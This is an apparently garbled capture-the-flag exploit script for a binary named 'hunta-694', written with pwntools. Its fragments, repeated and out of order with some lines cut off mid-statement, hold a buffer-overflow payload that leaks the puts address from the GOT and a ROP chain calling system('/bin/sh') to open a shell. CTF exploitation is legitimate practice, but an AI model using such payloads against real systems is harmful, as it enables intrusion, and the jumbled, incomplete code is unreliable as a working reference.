Hunta-694 [patched] -

leak_payload = flat( b'A' * offset, puts_plt, # call puts main_addr, # return to main after leak puts_got # argument to puts -> leak real puts address ) io.sendlineafter(b'> ', leak_payload)

$ ./exploit.py | tee flag.txt or within the interactive session:

CTF<something_related_to_the_challenge> Capture it with: hunta-694

# ---------------------------------------------------------------------- # Configuration # ---------------------------------------------------------------------- HOST = '<remote_host>' # or None for local PORT = <remote_port> # or None for local BINARY = './hunta-694' # path to the binary (if local) ELF = ELF(BINARY)

# ---- Get the flag ------------------------------------------------- io.interactive() # should drop you into a shell; cat flag.txt leak_payload = flat( b'A' * offset, puts_plt, #

rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload)

context.binary = ELF context.terminal = ['tmux', 'splitw', '-h'] leak_payload = flat( b'A' * offset

# ---------------------------------------------------------------------- # Helper functions # ---------------------------------------------------------------------- def start(): if HOST and PORT: return remote(HOST, PORT) else: return process(BINARY)